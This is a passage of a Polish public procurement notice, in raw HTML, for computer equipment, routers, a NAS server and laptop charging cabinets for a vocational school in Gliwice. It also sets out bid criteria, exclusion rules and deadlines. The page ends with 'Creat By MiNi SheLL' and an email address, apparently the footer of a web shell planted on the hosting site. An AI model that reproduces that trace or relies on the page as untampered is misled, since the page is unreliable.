class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. INFORMACJE PODSTAWOWE:<br/>Przedmiotem zamówienia jest wyposażenie w sprzęt komputerowy i multimedialny 5 pracowni nauki zawodu oraz gabinetu terapeutycznego w Zespole Szkół Budowlano - Ceramicznych w Gliwicach organizowane w ramach projektu o tytule &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>B. INFORMACJE SZCZEGÓŁOWE:<br/>Część nr 5 dotyczy dostawy: routera Wi-Fi wraz z okablowaniem (6 szt.) oraz serwera NAS (1 szt.).<br/><br/>C. Wymagania dotyczące realizacji przedmiotu zamówienia:<br/><br/>1. Zamawiający nie dopuszcza sprzętu prefabrykowanego.<br/>2. Dostarczany sprzęt musi być:<br/>a) kompletny, tj.: mieć okablowanie przystosowane do polskich gniazd sieciowych, zasilacze oraz wszystkie inne komponenty, zapewniające właściwą instalację i użytkowanie.<br/>b) fabrycznie nowy, nie noszący znamion użytkowania, wolny od wad, musi posiadać cechy i parametry minimalne określone przez Zamawiającego w załączniku nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia,<br/>c) musi być zapakowany w oryginalne opakowania producenta, opatrzone w etykiety identyfikujące każdy z produktów,<br/>d) powinien posiadać instrukcję obsługi w języku polskim, specyfikację techniczną, kartę gwarancyjną producenta. Dokumenty Wykonawca dostarcza wraz z dostawą sprzętu.<br/> <br/>D. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SWZ.<br/><br/>Wymagany termin gwarancji: min 24 miesiące, max 36 miesięcy,<br/>Wymagany termin rękojmi: okres rękojmi będzie równy okresowi gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32413100-2 - Rutery sieciowe</p> <p class="mb-0">48822000-6 - Serwery komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. INFORMACJE PODSTAWOWE:<br/>Przedmiotem zamówienia jest wyposażenie w sprzęt komputerowy i multimedialny 5 pracowni nauki zawodu oraz gabinetu terapeutycznego w Zespole Szkół Budowlano - Ceramicznych w Gliwicach organizowane w ramach projektu o tytule &#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>B. INFORMACJE SZCZEGÓŁOWE:<br/>Część nr 6 dotyczy dostawy: szafy do ładowania laptopów (4 szt.)<br/><br/>C. Wymagania dotyczące realizacji przedmiotu zamówienia:<br/><br/>1. Zamawiający nie dopuszcza sprzętu prefabrykowanego.<br/>2. Dostarczany sprzęt musi być:<br/>a) kompletny, tj.: mieć okablowanie przystosowane do polskich gniazd sieciowych, zasilacze oraz wszystkie inne komponenty, zapewniające właściwą instalację i użytkowanie.<br/>b) fabrycznie nowy, nie noszący znamion użytkowania, wolny od wad, musi posiadać cechy i parametry minimalne określone przez Zamawiającego w załączniku nr 7 do SWZ - szczegółowy opis przedmiotu zamówienia,<br/>c) musi być zapakowany w oryginalne opakowania producenta, opatrzone w etykiety identyfikujące każdy z produktów,<br/>d) powinien posiadać instrukcję obsługi w języku polskim, specyfikację techniczną, kartę gwarancyjną producenta. Dokumenty Wykonawca dostarcza wraz z dostawą sprzętu. <br/><br/>D. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SWZ.<br/><br/>Wymagany termin gwarancji: min 24 miesiące, max 36 miesięcy,<br/>Wymagany termin rękojmi: okres rękojmi będzie równy okresowi gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39134000-0 - Meble komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/><br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej w niniejszym punkcie, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania osoby, której dokument miał dotyczyć. Dokumenty te powinny być wystawione w terminach nie wcześniejszych niż podano powyżej.<br/><br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej o treści ZAŁĄCZNIKA NR 4 do SWZ w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/><br/>3) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp o treści ZAŁĄCZNIKA NR 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 6 wzoru umowy - ZAŁĄCZNIK NR 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Pełna nazwa projektu:<br/>&#34;Dostosowanie kwalifikacji i umiejętności uczniów Zespołu Szkół Budowlano-Ceramicznych w Gliwicach na potrzeby rynku pracy&#34;, nr FESL.10.23-IZ.01-073G/23, finansowanym ze środków Funduszu Sprawiedliwej Transformacji oraz budżetu państwa w ramach programu Fundusze Europejskie dla Śląskiego 2021-2027, Priorytet: X Fundusze Europejskie na transformację, Działanie 10.23 Edukacja zawodowa w procesie sprawiedliwej transformacji regionu.<br/><br/>2. Niniejsze zamówienie zostało ujęte w planie postępowań miejskiej jednostki organizacyjnej, na rzecz której prowadzone jest postępowanie o udzielenie zamówienia, tj. Zespół Szkół Budowlano-Ceramicznych w Gliwicach, ul. Bojkowska 16, 44-100 Gliwice.<br/>Numer planu postępowań w Biuletynie Zamówień Publicznych : nr 2025/BZP 00046090/04/P - pozycja w planie: 1.2.1.<br/><br/>3. Oferta powinna być sporządzona czytelnie, na formularzu oferty o treści ZAŁĄCZNIKA NR 1 do SWZ. Treść oferty musi być zgodna z warunkami zamówienia. Wszelkie wymagane dokumenty stanowią załączniki do oferty.<br/>UWAGA:<br/>W związku z tym, że Zamawiający udostępnia Wykonawcom własny &#34;Formularz oferty&#34; (tj. nie za pośrednictwem interaktywnego &#34;Formularza ofertowego&#34;, który umożliwia Platforma e-zamówienia), podczas czynności składania oferty może pojawić się komunikat o następującej treści: &#34;Czy chcesz kontynuować? Postępowanie nie posiada opublikowanego formularza do tego etapu postępowania. Plik [w tym miejscu pojawia się nazwa pliku] nie jest poprawnym formularzem interaktywnym wygenerowanym na Platformie.&#34; W takim przypadku należy wybrać opcję &#34;Tak, chcę kontynuować&#34;.<br/><br/>4. Wraz z ofertą należy złożyć:<br/>a) wypełniony formularz cenowy - o treści ZAŁĄCZNIKA NR 5a - dla części 1, 5b - dla części 2, 5c - dla części 3, 5d - dla części 4, 5e - dla części 5, 5f - dla części 6 do SWZ,<br/>b) upoważnienie osób do podpisania oferty musi bezpośrednio wynikać z dokumentów rejestrowych. W przeciwnym wypadku do oferty należy dołączyć stosowne pełnomocnictwo,<br/>c) oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do SWZ.<br/><br/>5. Termin wykonania zamówienia: do 30 dni kalendarzowych od dnia zawarcia umowy dla każdej z części zamówienia.<br/><br/>6. Obowiązującą formą zapłaty za przedmiot zamówienia będzie wynagrodzenie ryczałtowe.<br/><br/>7. Zgodnie z art. 83 ust. 1 pkt 26) ustawy o podatku od towarów i usług (VAT) stawkę podatku w wysokości 0% stosuje się dostaw sprzętu sprzętu komputerowego dla jednostek oświatowych - przy zachowaniu warunków, o których mowa w art. 83 ust. 13-15 powyższej ustawy. Tym samym Wykonawca, któremu zostanie udzielone zamówienie (zawarcie umowy) po spełnieniu warunków określonych w art. 83 ust. 13-15 ustawy o podatku od towarów i usług (VAT) będzie mógł zastosować stawkę podatku 0% dla poszczególnego sprzętu (zgodnie z załącznikiem nr 8 do powyższej ustawy).

Creat By MiNi SheLL
Email: jattceo@gmail.com